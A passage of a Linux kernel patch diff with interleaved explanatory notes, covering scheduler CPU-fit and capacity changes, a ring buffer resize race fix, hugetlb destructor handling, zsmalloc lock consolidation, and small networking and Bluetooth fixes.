++			best_energy_cpu = max_spare_cap_cpu;
++			best_fits = max_fits;
++			best_thermal_cap = cpu_thermal_cap;
+ 		}
+ 	}
+ 	rcu_read_unlock();
+ 
+-	if (best_delta < prev_delta)
++	if ((best_fits > prev_fits) ||
++	    ((best_fits > 0) && (best_delta < prev_delta)) ||
++	    ((best_fits < 0) && (best_thermal_cap > prev_thermal_cap)))
+ 		target = best_energy_cpu;
+ 
+ 	return target;
+@@ -8870,82 +8921,16 @@ static unsigned long scale_rt_capacity(int cpu)
+ 
+ static void update_cpu_capacity(struct sched_domain *sd, int cpu)
+ {
+-	unsigned long capacity_orig = arch_scale_cpu_capacity(cpu);
+ 	unsigned long capacity = scale_rt_capacity(cpu);
+ 	struct sched_group *sdg = sd->groups;
+-	struct rq *rq = cpu_rq(cpu);
+ 
+-	rq->cpu_capacity_orig = capacity_orig;
++	cpu_rq(cpu)->cpu_capacity_orig = arch_scale_cpu_capacity(cpu);
+ 
+ 	if (!capacity)
+ 		capacity = 1;
+ 
+-	rq->cpu_capacity = capacity;
+-
+-	/*
+-	 * Detect if the performance domain is in capacity inversion state.
+-	 *
+-	 * Capacity inversion happens when another perf domain with equal or
+-	 * lower capacity_orig_of() ends up having higher capacity than this
+-	 * domain after subtracting thermal pressure.
+-	 *
+-	 * We only take into account thermal pressure in this detection as it's
+-	 * the only metric that actually results in *real* reduction of
+-	 * capacity due to performance points (OPPs) being dropped/become
+-	 * unreachable due to thermal throttling.
+-	 *
+-	 * We assume:
+-	 *   * That all cpus in a perf domain have the same capacity_orig
+-	 *     (same uArch).
+-	 *   * Thermal pressure will impact all cpus in this perf domain
+-	 *     equally.
+-	 */
+-	if (sched_energy_enabled()) {
+-		unsigned long inv_cap = capacity_orig - thermal_load_avg(rq);
+-		struct perf_domain *pd;
+-
+-		rcu_read_lock();
+-
+-		pd = rcu_dereference(rq->rd->pd);
+-		rq->cpu_capacity_inverted = 0;
+-
+-		for (; pd; pd = pd->next) {
+-			struct cpumask *pd_span = perf_domain_span(pd);
+-			unsigned long pd_cap_orig, pd_cap;
+-
+-			/* We can't be inverted against our own pd */
+-			if (cpumask_test_cpu(cpu_of(rq), pd_span))
+-				continue;
+-
+-			cpu = cpumask_any(pd_span);
+-			pd_cap_orig = arch_scale_cpu_capacity(cpu);
+-
+-			if (capacity_orig < pd_cap_orig)
+-				continue;
+-
+-			/*
+-			 * handle the case of multiple perf domains have the
+-			 * same capacity_orig but one of them is under higher
+-			 * thermal pressure. We record it as capacity
+-			 * inversion.
+-			 */
+-			if (capacity_orig == pd_cap_orig) {
+-				pd_cap = pd_cap_orig - thermal_load_avg(cpu_rq(cpu));
+-
+-				if (pd_cap > inv_cap) {
+-					rq->cpu_capacity_inverted = inv_cap;
+-					break;
+-				}
+-			} else if (pd_cap_orig > inv_cap) {
+-				rq->cpu_capacity_inverted = inv_cap;
+-				break;
+-			}
+-		}
+-
+-		rcu_read_unlock();
+-	}
+-
+-	trace_sched_cpu_capacity_tp(rq);
++	cpu_rq(cpu)->cpu_capacity = capacity;
++	trace_sched_cpu_capacity_tp(cpu_rq(cpu));
+ 
+ 	sdg->sgc->capacity = capacity;
+ 	sdg->sgc->min_capacity = capacity;
+@@ -10183,24 +10168,23 @@ static struct sched_group *find_busiest_group(struct lb_env *env)
+ 	 */
+ 	update_sd_lb_stats(env, &sds);
+ 
+-	if (sched_energy_enabled()) {
+-		struct root_domain *rd = env->dst_rq->rd;
+-
+-		if (rcu_dereference(rd->pd) && !READ_ONCE(rd->overutilized))
+-			goto out_balanced;
+-	}
+-
+-	local = &sds.local_stat;
+-	busiest = &sds.busiest_stat;
+-
+ 	/* There is no busy sibling group to pull tasks from */
+ 	if (!sds.busiest)
+ 		goto out_balanced;
+ 
++	busiest = &sds.busiest_stat;
++
+ 	/* Misfit tasks should be dealt with regardless of the avg load */
+ 	if (busiest->group_type == group_misfit_task)
+ 		goto force_balance;
+ 
++	if (sched_energy_enabled()) {
++		struct root_domain *rd = env->dst_rq->rd;
++
++		if (rcu_dereference(rd->pd) && !READ_ONCE(rd->overutilized))
++			goto out_balanced;
++	}
++
+ 	/* ASYM feature bypasses nice load balance check */
+ 	if (busiest->group_type == group_asym_packing)
+ 		goto force_balance;
+@@ -10213,6 +10197,7 @@ static struct sched_group *find_busiest_group(struct lb_env *env)
+ 	if (busiest->group_type == group_imbalanced)
+ 		goto force_balance;
+ 
++	local = &sds.local_stat;
+ 	/*
+ 	 * If the local group is busier than the selected busiest group
+ 	 * don't try and pull any tasks.
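The thread running through all of the scheduler hunks above is that
util_fits_cpu() stops being a boolean and becomes tri-state: a positive value
means the CPU satisfies both the utilization and the uclamp performance hints,
0 means the utilization itself does not fit, and -1 means everything fits
except that thermal pressure keeps the CPU from honouring uclamp_min. Callers
such as select_idle_capacity() and find_energy_efficient_cpu() then rank the
-1 candidates as usable fallbacks instead of rejecting them, which is what
replaces the removed capacity-inversion machinery. A condensed sketch of the
caller-side interpretation (consider_as_fallback() is a placeholder):

	int fits = util_fits_cpu(util, util_min, util_max, cpu);

	if (fits > 0)
		return cpu;			/* full fit: stop searching */
	else if (fits < 0)
		consider_as_fallback(cpu);	/* only uclamp_min missed: rank by capacity */
	/* fits == 0: utilization does not fit at all, skip this CPU */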
+diff --git a/kernel/sched/sched.h b/kernel/sched/sched.h
+index 5f18460f62f0f..d6d488e8eb554 100644
+--- a/kernel/sched/sched.h
++++ b/kernel/sched/sched.h
+@@ -1041,7 +1041,6 @@ struct rq {
+ 
+ 	unsigned long		cpu_capacity;
+ 	unsigned long		cpu_capacity_orig;
+-	unsigned long		cpu_capacity_inverted;
+ 
+ 	struct balance_callback *balance_callback;
+ 
+@@ -2879,24 +2878,6 @@ static inline unsigned long capacity_orig_of(int cpu)
+ 	return cpu_rq(cpu)->cpu_capacity_orig;
+ }
+ 
+-/*
+- * Returns inverted capacity if the CPU is in capacity inversion state.
+- * 0 otherwise.
+- *
+- * Capacity inversion detection only considers thermal impact where actual
+- * performance points (OPPs) gets dropped.
+- *
+- * Capacity inversion state happens when another performance domain that has
+- * equal or lower capacity_orig_of() becomes effectively larger than the perf
+- * domain this CPU belongs to due to thermal pressure throttling it hard.
+- *
+- * See comment in update_cpu_capacity().
+- */
+-static inline unsigned long cpu_in_capacity_inversion(int cpu)
+-{
+-	return cpu_rq(cpu)->cpu_capacity_inverted;
+-}
+-
+ /**
+  * enum cpu_util_type - CPU utilization type
+  * @FREQUENCY_UTIL:	Utilization used to select frequency
+diff --git a/kernel/trace/ring_buffer.c b/kernel/trace/ring_buffer.c
+index c49ed619a64dd..de55107aef5d5 100644
+--- a/kernel/trace/ring_buffer.c
++++ b/kernel/trace/ring_buffer.c
+@@ -544,6 +544,7 @@ struct trace_buffer {
+ 	unsigned			flags;
+ 	int				cpus;
+ 	atomic_t			record_disabled;
++	atomic_t			resizing;
+ 	cpumask_var_t			cpumask;
+ 
+ 	struct lock_class_key		*reader_lock_key;
+@@ -2173,7 +2174,7 @@ int ring_buffer_resize(struct trace_buffer *buffer, unsigned long size,
+ 
+ 	/* prevent another thread from changing buffer sizes */
+ 	mutex_lock(&buffer->mutex);
+-
++	atomic_inc(&buffer->resizing);
+ 
+ 	if (cpu_id == RING_BUFFER_ALL_CPUS) {
+ 		/*
+@@ -2312,6 +2313,7 @@ int ring_buffer_resize(struct trace_buffer *buffer, unsigned long size,
+ 		atomic_dec(&buffer->record_disabled);
+ 	}
+ 
++	atomic_dec(&buffer->resizing);
+ 	mutex_unlock(&buffer->mutex);
+ 	return 0;
+ 
+@@ -2332,6 +2334,7 @@ int ring_buffer_resize(struct trace_buffer *buffer, unsigned long size,
+ 		}
+ 	}
+  out_err_unlock:
++	atomic_dec(&buffer->resizing);
+ 	mutex_unlock(&buffer->mutex);
+ 	return err;
+ }
+@@ -5539,6 +5542,15 @@ int ring_buffer_swap_cpu(struct trace_buffer *buffer_a,
+ 	if (local_read(&cpu_buffer_b->committing))
+ 		goto out_dec;
+ 
++	/*
++	 * When resize is in progress, we cannot swap it because
++	 * it will mess the state of the cpu buffer.
++	 */
++	if (atomic_read(&buffer_a->resizing))
++		goto out_dec;
++	if (atomic_read(&buffer_b->resizing))
++		goto out_dec;
++
+ 	buffer_a->buffers[cpu] = cpu_buffer_b;
+ 	buffer_b->buffers[cpu] = cpu_buffer_a;
+ 
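The new resizing counter closes a window where ring_buffer_swap_cpu() could
exchange per-CPU buffers while ring_buffer_resize() was still moving pages
between them. The resize path brackets its work with atomic_inc()/atomic_dec(),
and the swap path treats any non-zero count as busy. Condensed shape of the two
sides (function names are illustrative, bodies elided):

	static int resize(struct trace_buffer *buf)
	{
		mutex_lock(&buf->mutex);
		atomic_inc(&buf->resizing);
		/* ... add/remove pages on each per-cpu buffer ... */
		atomic_dec(&buf->resizing);
		mutex_unlock(&buf->mutex);
		return 0;
	}

	static int swap_cpu(struct trace_buffer *a, struct trace_buffer *b, int cpu)
	{
		if (atomic_read(&a->resizing) || atomic_read(&b->resizing))
			return -EBUSY;		/* never swap mid-resize */
		/* ... exchange a->buffers[cpu] and b->buffers[cpu] ... */
		return 0;
	}

The matching trace.c hunk only extends the user-visible message, since a failed
snapshot swap can now also mean a resize was in flight.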
+diff --git a/kernel/trace/trace.c b/kernel/trace/trace.c
+index 709af9631be45..af33c5a4166d4 100644
+--- a/kernel/trace/trace.c
++++ b/kernel/trace/trace.c
+@@ -1885,9 +1885,10 @@ update_max_tr_single(struct trace_array *tr, struct task_struct *tsk, int cpu)
+ 		 * place on this CPU. We fail to record, but we reset
+ 		 * the max trace buffer (no one writes directly to it)
+ 		 * and flag that it failed.
++		 * Another reason is resize is in progress.
+ 		 */
+ 		trace_array_printk_buf(tr->max_buffer.buffer, _THIS_IP_,
+-			"Failed to swap buffers due to commit in progress\n");
++			"Failed to swap buffers due to commit or resize in progress\n");
+ 	}
+ 
+ 	WARN_ON_ONCE(ret && ret != -EAGAIN && ret != -EBUSY);
+diff --git a/mm/hugetlb.c b/mm/hugetlb.c
+index d3ffa0fd49e57..c38ec6efec0f7 100644
+--- a/mm/hugetlb.c
++++ b/mm/hugetlb.c
+@@ -1581,9 +1581,37 @@ static inline void destroy_compound_gigantic_page(struct page *page,
+ 						unsigned int order) { }
+ #endif
+ 
++static inline void __clear_hugetlb_destructor(struct hstate *h,
++						struct page *page)
++{
++	lockdep_assert_held(&hugetlb_lock);
++
++	/*
++	 * Very subtle
++	 *
++	 * For non-gigantic pages set the destructor to the normal compound
++	 * page dtor.  This is needed in case someone takes an additional
++	 * temporary ref to the page, and freeing is delayed until they drop
++	 * their reference.
++	 *
++	 * For gigantic pages set the destructor to the null dtor.  This
++	 * destructor will never be called.  Before freeing the gigantic
++	 * page destroy_compound_gigantic_folio will turn the folio into a
++	 * simple group of pages.  After this the destructor does not
++	 * apply.
++	 *
++	 */
++	if (hstate_is_gigantic(h))
++		set_compound_page_dtor(page, NULL_COMPOUND_DTOR);
++	else
++		set_compound_page_dtor(page, COMPOUND_PAGE_DTOR);
++}
++
+ /*
+- * Remove hugetlb page from lists, and update dtor so that page appears
+- * as just a compound page.
++ * Remove hugetlb page from lists.
++ * If vmemmap exists for the page, update dtor so that the page appears
++ * as just a compound page.  Otherwise, wait until after allocating vmemmap
++ * to update dtor.
+  *
+  * A reference is held on the page, except in the case of demote.
+  *
+@@ -1614,31 +1642,19 @@ static void __remove_hugetlb_page(struct hstate *h, struct page *page,
+ 	}
+ 
+ 	/*
+-	 * Very subtle
+-	 *
+-	 * For non-gigantic pages set the destructor to the normal compound
+-	 * page dtor.  This is needed in case someone takes an additional
+-	 * temporary ref to the page, and freeing is delayed until they drop
+-	 * their reference.
+-	 *
+-	 * For gigantic pages set the destructor to the null dtor.  This
+-	 * destructor will never be called.  Before freeing the gigantic
+-	 * page destroy_compound_gigantic_page will turn the compound page
+-	 * into a simple group of pages.  After this the destructor does not
+-	 * apply.
+-	 *
+-	 * This handles the case where more than one ref is held when and
+-	 * after update_and_free_page is called.
+-	 *
+-	 * In the case of demote we do not ref count the page as it will soon
+-	 * be turned into a page of smaller size.
++	 * We can only clear the hugetlb destructor after allocating vmemmap
++	 * pages.  Otherwise, someone (memory error handling) may try to write
++	 * to tail struct pages.
++	 */
++	if (!HPageVmemmapOptimized(page))
++		__clear_hugetlb_destructor(h, page);
++
++	 /*
++	  * In the case of demote we do not ref count the page as it will soon
++	  * be turned into a page of smaller size.
+ 	 */
+ 	if (!demote)
+ 		set_page_refcounted(page);
+-	if (hstate_is_gigantic(h))
+-		set_compound_page_dtor(page, NULL_COMPOUND_DTOR);
+-	else
+-		set_compound_page_dtor(page, COMPOUND_PAGE_DTOR);
+ 
+ 	h->nr_huge_pages--;
+ 	h->nr_huge_pages_node[nid]--;
+@@ -1706,6 +1722,7 @@ static void __update_and_free_page(struct hstate *h, struct page *page)
+ {
+ 	int i;
+ 	struct page *subpage;
++	bool clear_dtor = HPageVmemmapOptimized(page);
+ 
+ 	if (hstate_is_gigantic(h) && !gigantic_page_runtime_supported())
+ 		return;
+@@ -1736,6 +1753,16 @@ static void __update_and_free_page(struct hstate *h, struct page *page)
+ 	if (unlikely(PageHWPoison(page)))
+ 		hugetlb_clear_page_hwpoison(page);
+ 
++	/*
++	 * If vmemmap pages were allocated above, then we need to clear the
++	 * hugetlb destructor under the hugetlb lock.
++	 */
++	if (clear_dtor) {
++		spin_lock_irq(&hugetlb_lock);
++		__clear_hugetlb_destructor(h, page);
++		spin_unlock_irq(&hugetlb_lock);
++	}
++
+ 	for (i = 0; i < pages_per_huge_page(h); i++) {
+ 		subpage = nth_page(page, i);
+ 		subpage->flags &= ~(1 << PG_locked | 1 << PG_error |
+diff --git a/mm/zsmalloc.c b/mm/zsmalloc.c
+index d03941cace2c4..37f755c9a1b70 100644
+--- a/mm/zsmalloc.c
++++ b/mm/zsmalloc.c
+@@ -33,8 +33,7 @@
+ /*
+  * lock ordering:
+  *	page_lock
+- *	pool->migrate_lock
+- *	class->lock
++ *	pool->lock
+  *	zspage->lock
+  */
+ 
+@@ -192,7 +191,6 @@ static const int fullness_threshold_frac = 4;
+ static size_t huge_class_size;
+ 
+ struct size_class {
+-	spinlock_t lock;
+ 	struct list_head fullness_list[NR_ZS_FULLNESS];
+ 	/*
+ 	 * Size of objects stored in this class. Must be multiple
+@@ -247,8 +245,8 @@ struct zs_pool {
+ #ifdef CONFIG_COMPACTION
+ 	struct work_struct free_work;
+ #endif
+-	/* protect page/zspage migration */
+-	rwlock_t migrate_lock;
++	spinlock_t lock;
++	atomic_t compaction_in_progress;
+ };
+ 
+ struct zspage {
+@@ -355,7 +353,7 @@ static void cache_free_zspage(struct zs_pool *pool, struct zspage *zspage)
+ 	kmem_cache_free(pool->zspage_cachep, zspage);
+ }
+ 
+-/* class->lock(which owns the handle) synchronizes races */
++/* pool->lock(which owns the handle) synchronizes races */
+ static void record_obj(unsigned long handle, unsigned long obj)
+ {
+ 	*(unsigned long *)handle = obj;
+@@ -452,7 +450,7 @@ static __maybe_unused int is_first_page(struct page *page)
+ 	return PagePrivate(page);
+ }
+ 
+-/* Protected by class->lock */
++/* Protected by pool->lock */
+ static inline int get_zspage_inuse(struct zspage *zspage)
+ {
+ 	return zspage->inuse;
+@@ -597,13 +595,13 @@ static int zs_stats_size_show(struct seq_file *s, void *v)
+ 		if (class->index != i)
+ 			continue;
+ 
+-		spin_lock(&class->lock);
++		spin_lock(&pool->lock);
+ 		class_almost_full = zs_stat_get(class, CLASS_ALMOST_FULL);
+ 		class_almost_empty = zs_stat_get(class, CLASS_ALMOST_EMPTY);
+ 		obj_allocated = zs_stat_get(class, OBJ_ALLOCATED);
+ 		obj_used = zs_stat_get(class, OBJ_USED);
+ 		freeable = zs_can_compact(class);
+-		spin_unlock(&class->lock);
++		spin_unlock(&pool->lock);
+ 
+ 		objs_per_zspage = class->objs_per_zspage;
+ 		pages_used = obj_allocated / objs_per_zspage *
+@@ -916,7 +914,7 @@ static void __free_zspage(struct zs_pool *pool, struct size_class *class,
+ 
+ 	get_zspage_mapping(zspage, &class_idx, &fg);
+ 
+-	assert_spin_locked(&class->lock);
++	assert_spin_locked(&pool->lock);
+ 
+ 	VM_BUG_ON(get_zspage_inuse(zspage));
+ 	VM_BUG_ON(fg != ZS_EMPTY);
+@@ -1247,19 +1245,19 @@ void *zs_map_object(struct zs_pool *pool, unsigned long handle,
+ 	BUG_ON(in_interrupt());
+ 
+ 	/* It guarantees it can get zspage from handle safely */
+-	read_lock(&pool->migrate_lock);
++	spin_lock(&pool->lock);
+ 	obj = handle_to_obj(handle);
+ 	obj_to_location(obj, &page, &obj_idx);
+ 	zspage = get_zspage(page);
+ 
+ 	/*
+-	 * migration cannot move any zpages in this zspage. Here, class->lock
++	 * migration cannot move any zpages in this zspage. Here, pool->lock
+ 	 * is too heavy since callers would take some time until they calls
+ 	 * zs_unmap_object API so delegate the locking from class to zspage
+ 	 * which is smaller granularity.
+ 	 */
+ 	migrate_read_lock(zspage);
+-	read_unlock(&pool->migrate_lock);
++	spin_unlock(&pool->lock);
+ 
+ 	class = zspage_class(pool, zspage);
+ 	off = (class->size * obj_idx) & ~PAGE_MASK;
+@@ -1412,8 +1410,8 @@ unsigned long zs_malloc(struct zs_pool *pool, size_t size, gfp_t gfp)
+ 	size += ZS_HANDLE_SIZE;
+ 	class = pool->size_class[get_size_class_index(size)];
+ 
+-	/* class->lock effectively protects the zpage migration */
+-	spin_lock(&class->lock);
++	/* pool->lock effectively protects the zpage migration */
++	spin_lock(&pool->lock);
+ 	zspage = find_get_zspage(class);
+ 	if (likely(zspage)) {
+ 		obj = obj_malloc(pool, zspage, handle);
+@@ -1421,12 +1419,12 @@ unsigned long zs_malloc(struct zs_pool *pool, size_t size, gfp_t gfp)
+ 		fix_fullness_group(class, zspage);
+ 		record_obj(handle, obj);
+ 		class_stat_inc(class, OBJ_USED, 1);
+-		spin_unlock(&class->lock);
++		spin_unlock(&pool->lock);
+ 
+ 		return handle;
+ 	}
+ 
+-	spin_unlock(&class->lock);
++	spin_unlock(&pool->lock);
+ 
+ 	zspage = alloc_zspage(pool, class, gfp);
+ 	if (!zspage) {
+@@ -1434,7 +1432,7 @@ unsigned long zs_malloc(struct zs_pool *pool, size_t size, gfp_t gfp)
+ 		return (unsigned long)ERR_PTR(-ENOMEM);
+ 	}
+ 
+-	spin_lock(&class->lock);
++	spin_lock(&pool->lock);
+ 	obj = obj_malloc(pool, zspage, handle);
+ 	newfg = get_fullness_group(class, zspage);
+ 	insert_zspage(class, zspage, newfg);
+@@ -1447,7 +1445,7 @@ unsigned long zs_malloc(struct zs_pool *pool, size_t size, gfp_t gfp)
+ 
+ 	/* We completely set up zspage so mark them as movable */
+ 	SetZsPageMovable(pool, zspage);
+-	spin_unlock(&class->lock);
++	spin_unlock(&pool->lock);
+ 
+ 	return handle;
+ }
+@@ -1491,16 +1489,14 @@ void zs_free(struct zs_pool *pool, unsigned long handle)
+ 		return;
+ 
+ 	/*
+-	 * The pool->migrate_lock protects the race with zpage's migration
++	 * The pool->lock protects the race with zpage's migration
+ 	 * so it's safe to get the page from handle.
+ 	 */
+-	read_lock(&pool->migrate_lock);
++	spin_lock(&pool->lock);
+ 	obj = handle_to_obj(handle);
+ 	obj_to_page(obj, &f_page);
+ 	zspage = get_zspage(f_page);
+ 	class = zspage_class(pool, zspage);
+-	spin_lock(&class->lock);
+-	read_unlock(&pool->migrate_lock);
+ 
+ 	obj_free(class->size, obj);
+ 	class_stat_dec(class, OBJ_USED, 1);
+@@ -1510,7 +1506,7 @@ void zs_free(struct zs_pool *pool, unsigned long handle)
+ 
+ 	free_zspage(pool, class, zspage);
+ out:
+-	spin_unlock(&class->lock);
++	spin_unlock(&pool->lock);
+ 	cache_free_handle(pool, handle);
+ }
+ EXPORT_SYMBOL_GPL(zs_free);
+@@ -1821,6 +1817,7 @@ static void replace_sub_page(struct size_class *class, struct zspage *zspage,
+ 
+ static bool zs_page_isolate(struct page *page, isolate_mode_t mode)
+ {
++	struct zs_pool *pool;
+ 	struct zspage *zspage;
+ 
+ 	/*
+@@ -1831,9 +1828,10 @@ static bool zs_page_isolate(struct page *page, isolate_mode_t mode)
+ 	VM_BUG_ON_PAGE(PageIsolated(page), page);
+ 
+ 	zspage = get_zspage(page);
+-	migrate_write_lock(zspage);
++	pool = zspage->pool;
++	spin_lock(&pool->lock);
+ 	inc_zspage_isolation(zspage);
+-	migrate_write_unlock(zspage);
++	spin_unlock(&pool->lock);
+ 
+ 	return true;
+ }
+@@ -1867,16 +1865,12 @@ static int zs_page_migrate(struct page *newpage, struct page *page,
+ 	pool = zspage->pool;
+ 
+ 	/*
+-	 * The pool migrate_lock protects the race between zpage migration
++	 * The pool's lock protects the race between zpage migration
+ 	 * and zs_free.
+ 	 */
+-	write_lock(&pool->migrate_lock);
++	spin_lock(&pool->lock);
+ 	class = zspage_class(pool, zspage);
+ 
+-	/*
+-	 * the class lock protects zpage alloc/free in the zspage.
+-	 */
+-	spin_lock(&class->lock);
+ 	/* the migrate_write_lock protects zpage access via zs_map_object */
+ 	migrate_write_lock(zspage);
+ 
+@@ -1904,13 +1898,12 @@ static int zs_page_migrate(struct page *newpage, struct page *page,
+ 	kunmap_atomic(s_addr);
+ 
+ 	replace_sub_page(class, zspage, newpage, page);
++	dec_zspage_isolation(zspage);
+ 	/*
+ 	 * Since we complete the data copy and set up new zspage structure,
+-	 * it's okay to release migration_lock.
++	 * it's okay to release the pool's lock.
+ 	 */
+-	write_unlock(&pool->migrate_lock);
+-	spin_unlock(&class->lock);
+-	dec_zspage_isolation(zspage);
++	spin_unlock(&pool->lock);
+ 	migrate_write_unlock(zspage);
+ 
+ 	get_page(newpage);
+@@ -1927,15 +1920,17 @@ static int zs_page_migrate(struct page *newpage, struct page *page,
+ 
+ static void zs_page_putback(struct page *page)
+ {
++	struct zs_pool *pool;
+ 	struct zspage *zspage;
+ 
+ 	VM_BUG_ON_PAGE(!PageMovable(page), page);
+ 	VM_BUG_ON_PAGE(!PageIsolated(page), page);
+ 
+ 	zspage = get_zspage(page);
+-	migrate_write_lock(zspage);
++	pool = zspage->pool;
++	spin_lock(&pool->lock);
+ 	dec_zspage_isolation(zspage);
+-	migrate_write_unlock(zspage);
++	spin_unlock(&pool->lock);
+ }
+ 
+ static const struct movable_operations zsmalloc_mops = {
+@@ -1964,9 +1959,9 @@ static void async_free_zspage(struct work_struct *work)
+ 		if (class->index != i)
+ 			continue;
+ 
+-		spin_lock(&class->lock);
++		spin_lock(&pool->lock);
+ 		list_splice_init(&class->fullness_list[ZS_EMPTY], &free_pages);
+-		spin_unlock(&class->lock);
++		spin_unlock(&pool->lock);
+ 	}
+ 
+ 	list_for_each_entry_safe(zspage, tmp, &free_pages, list) {
+@@ -1976,9 +1971,9 @@ static void async_free_zspage(struct work_struct *work)
+ 		get_zspage_mapping(zspage, &class_idx, &fullness);
+ 		VM_BUG_ON(fullness != ZS_EMPTY);
+ 		class = pool->size_class[class_idx];
+-		spin_lock(&class->lock);
++		spin_lock(&pool->lock);
+ 		__free_zspage(pool, class, zspage);
+-		spin_unlock(&class->lock);
++		spin_unlock(&pool->lock);
+ 	}
+ };
+ 
+@@ -2039,10 +2034,11 @@ static unsigned long __zs_compact(struct zs_pool *pool,
+ 	struct zspage *dst_zspage = NULL;
+ 	unsigned long pages_freed = 0;
+ 
+-	/* protect the race between zpage migration and zs_free */
+-	write_lock(&pool->migrate_lock);
+-	/* protect zpage allocation/free */
+-	spin_lock(&class->lock);
++	/*
++	 * protect the race between zpage migration and zs_free
++	 * as well as zpage allocation/free
++	 */
++	spin_lock(&pool->lock);
+ 	while ((src_zspage = isolate_zspage(class, true))) {
+ 		/* protect someone accessing the zspage(i.e., zs_map_object) */
+ 		migrate_write_lock(src_zspage);
+@@ -2067,7 +2063,7 @@ static unsigned long __zs_compact(struct zs_pool *pool,
+ 			putback_zspage(class, dst_zspage);
+ 			migrate_write_unlock(dst_zspage);
+ 			dst_zspage = NULL;
+-			if (rwlock_is_contended(&pool->migrate_lock))
++			if (spin_is_contended(&pool->lock))
+ 				break;
+ 		}
+ 
+@@ -2084,11 +2080,9 @@ static unsigned long __zs_compact(struct zs_pool *pool,
+ 			pages_freed += class->pages_per_zspage;
+ 		} else
+ 			migrate_write_unlock(src_zspage);
+-		spin_unlock(&class->lock);
+-		write_unlock(&pool->migrate_lock);
++		spin_unlock(&pool->lock);
+ 		cond_resched();
+-		write_lock(&pool->migrate_lock);
+-		spin_lock(&class->lock);
++		spin_lock(&pool->lock);
+ 	}
+ 
+ 	if (src_zspage) {
+@@ -2096,8 +2090,7 @@ static unsigned long __zs_compact(struct zs_pool *pool,
+ 		migrate_write_unlock(src_zspage);
+ 	}
+ 
+-	spin_unlock(&class->lock);
+-	write_unlock(&pool->migrate_lock);
++	spin_unlock(&pool->lock);
+ 
+ 	return pages_freed;
+ }
+@@ -2108,6 +2101,15 @@ unsigned long zs_compact(struct zs_pool *pool)
+ 	struct size_class *class;
+ 	unsigned long pages_freed = 0;
+ 
++	/*
++	 * Pool compaction is performed under pool->lock so it is basically
++	 * single-threaded. Having more than one thread in __zs_compact()
++	 * will increase pool->lock contention, which will impact other
++	 * zsmalloc operations that need pool->lock.
++	 */
++	if (atomic_xchg(&pool->compaction_in_progress, 1))
++		return 0;
++
+ 	for (i = ZS_SIZE_CLASSES - 1; i >= 0; i--) {
+ 		class = pool->size_class[i];
+ 		if (class->index != i)
+@@ -2115,6 +2117,7 @@ unsigned long zs_compact(struct zs_pool *pool)
+ 		pages_freed += __zs_compact(pool, class);
+ 	}
+ 	atomic_long_add(pages_freed, &pool->stats.pages_compacted);
++	atomic_set(&pool->compaction_in_progress, 0);
+ 
+ 	return pages_freed;
+ }
+@@ -2200,7 +2203,8 @@ struct zs_pool *zs_create_pool(const char *name)
+ 		return NULL;
+ 
+ 	init_deferred_free(pool);
+-	rwlock_init(&pool->migrate_lock);
++	spin_lock_init(&pool->lock);
++	atomic_set(&pool->compaction_in_progress, 0);
+ 
+ 	pool->name = kstrdup(name, GFP_KERNEL);
+ 	if (!pool->name)
+@@ -2271,7 +2275,6 @@ struct zs_pool *zs_create_pool(const char *name)
+ 		class->index = i;
+ 		class->pages_per_zspage = pages_per_zspage;
+ 		class->objs_per_zspage = objs_per_zspage;
+-		spin_lock_init(&class->lock);
+ 		pool->size_class[i] = class;
+ 		for (fullness = ZS_EMPTY; fullness < NR_ZS_FULLNESS;
+ 							fullness++)
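Beyond folding migrate_lock and the per-class locks into a single pool->lock,
the series adds a try-lock built from atomic_xchg() so that compaction stays
single-threaded: the first caller swaps 0 -> 1 and proceeds, and every
concurrent caller sees the old value 1 and backs off immediately rather than
piling up on pool->lock. Sketch of the idiom (function name illustrative):

	static unsigned long pool_compact_once(struct zs_pool *pool)
	{
		unsigned long pages_freed = 0;

		if (atomic_xchg(&pool->compaction_in_progress, 1))
			return 0;	/* another thread is already compacting */

		/* ... walk size classes, compacting under pool->lock ... */

		atomic_set(&pool->compaction_in_progress, 0);
		return pages_freed;
	}

atomic_xchg() implies a full barrier, so the flag cannot be observed clear
while the critical section's effects are still in flight.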
+diff --git a/net/bluetooth/l2cap_core.c b/net/bluetooth/l2cap_core.c
+index 02fc9961464cf..a7899857aee5d 100644
+--- a/net/bluetooth/l2cap_core.c
++++ b/net/bluetooth/l2cap_core.c
+@@ -6375,9 +6375,14 @@ static inline int l2cap_le_command_rej(struct l2cap_conn *conn,
+ 	if (!chan)
+ 		goto done;
+ 
++	chan = l2cap_chan_hold_unless_zero(chan);
++	if (!chan)
++		goto done;
++
+ 	l2cap_chan_lock(chan);
+ 	l2cap_chan_del(chan, ECONNREFUSED);
+ 	l2cap_chan_unlock(chan);
++	l2cap_chan_put(chan);
+ 
+ done:
+ 	mutex_unlock(&conn->chan_lock);
+diff --git a/net/bluetooth/mgmt.c b/net/bluetooth/mgmt.c
+index 89c94f3e96bc3..d2e8565d0b33f 100644
+--- a/net/bluetooth/mgmt.c
++++ b/net/bluetooth/mgmt.c
+@@ -7277,7 +7277,7 @@ static void get_conn_info_complete(struct hci_dev *hdev, void *data, int err)
+ 
+ 	bt_dev_dbg(hdev, "err %d", err);
+ 
+-	memcpy(&rp.addr, &cp->addr.bdaddr, sizeof(rp.addr));
++	memcpy(&rp.addr, &cp->addr, sizeof(rp.addr));
+ 
+ 	status = mgmt_status(err);
+ 	if (status == MGMT_STATUS_SUCCESS) {
+diff --git a/net/core/sock.c b/net/core/sock.c
+index 3b5304f084ef3..509773919d302 100644
+--- a/net/core/sock.c
++++ b/net/core/sock.c
+@@ -3099,7 +3099,7 @@ void __sk_mem_reduce_allocated(struct sock *sk, int amount)
+ 	if (mem_cgroup_sockets_enabled && sk->sk_memcg)
+ 		mem_cgroup_uncharge_skmem(sk->sk_memcg, amount);
+ 
+-	if (sk_under_memory_pressure(sk) &&
++	if (sk_under_global_memory_pressure(sk) &&
+ 	    (sk_memory_allocated(sk) < sk_prot_mem_limits(sk, 0)))
+ 		sk_leave_memory_pressure(sk);
+ }
+diff --git a/net/ipv4/ip_vti.c b/net/ipv4/ip_vti.c
+index 8c2bd1d9ddce3..615c1dcf3a28e 100644
+--- a/net/ipv4/ip_vti.c
++++ b/net/ipv4/ip_vti.c
+@@ -287,12 +287,12 @@ static netdev_tx_t vti_tunnel_xmit(struct sk_buff *skb, struct net_device *dev)
+ 
+ 	switch (skb->protocol) {
+ 	case htons(ETH_P_IP):
+-		xfrm_decode_session(skb, &fl, AF_INET);
+ 		memset(IPCB(skb), 0, sizeof(*IPCB(skb)));
++		xfrm_decode_session(skb, &fl, AF_INET);
+ 		break;
+ 	case htons(ETH_P_IPV6):
+-		xfrm_decode_session(skb, &fl, AF_INET6);
